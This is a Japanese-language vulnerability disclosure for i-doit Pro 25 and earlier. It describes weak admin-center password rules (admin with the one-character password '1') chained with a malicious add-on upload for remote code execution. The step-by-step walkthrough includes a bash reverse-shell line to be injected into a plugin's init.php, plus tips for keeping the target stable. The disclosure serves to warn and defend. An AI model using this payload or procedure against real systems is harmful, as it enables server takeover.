
i-doit Pro 25 以下は、admin-center の脆弱なパスワード要件の脆弱性と、悪意のあるプラグインのアップロードによる RCE 脆弱性の影響を受けます。これらの脆弱性により、攻撃者はブルートフォースやパスワード推測を容易に行い、admin-center へのアクセスを取得し、悪意のあるプラグインをアップロードしてリモートコード実行を達成できる可能性があります。
製品の説明: i-doit は、synetics GmbH によって開発された Web ベースのオープンソース IT ドキュメンテーションおよび CMDB(構成管理データベース)です。i-doit Pro はこのソフトウェアの商用版であり、有料ライセンスが必要です。追加機能、プロフェッショナルサポート、定期的なアップデートと機能強化が含まれています。i-doit Pro を使用するにはライセンスの購入が必要で、コストはユーザー数と必要な機能によって異なります。
脆弱性の説明: この Web アプリケーションには、admin-center のアカウント作成時に脆弱なパスワード要件があることを発見しました。アプリケーションの所有者は、デフォルトのユーザー名「admin」で最小 1 文字のパスワードを設定することもできます。これにより、攻撃者はブルートフォースやパスワード推測を容易に行い、admin-center へのアクセスを取得し、悪意のあるプラグインをアップロードしてリモートコード実行を達成できる可能性があります。
影響を受ける Web ページ: admin-center ログインページ + プラグインインストール
影響を受けるパラメータとコンポーネント: admin-center ログインページ + プラグインインストール
ステップ 1: admin-center のアカウント作成にはパスワード要件やパスワードの複雑性が実装されていないため、ブルートフォースから開始できます。 以下のスクリーンショットは、ユーザー名「admin」、パスワード「1」でログインできることを示しています。


ステップ 2: Add-on タブに移動し、アップロードを選択します

ステップ 3: package.json が存在しなければならないなどの要件があります。また、ターゲットがすべてのクラスと関数をチェックするために async を実装していることを発見しました。しかし、顧客ポータルから適切なプラグインをダウンロードし、init.php 内のコードを編集/追加することができます。これがペイロードをトリガーした際にシステムクラッシュを防ぐ最も安全な方法です。 注: ペイロードトリガー後のシステムクラッシュを防ぐため、行の末尾に & を付けてください。init.php はペイロードを注入するのに最適な場所です。 例 : exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");



注: 再度 ZIP 化してアップロードすることを忘れないでください


注: Install をクリックし、選択した Add-on をアクティブ化します

注: ペイロードは誰かがログインしたときにトリガーされます。誰でも構いません。
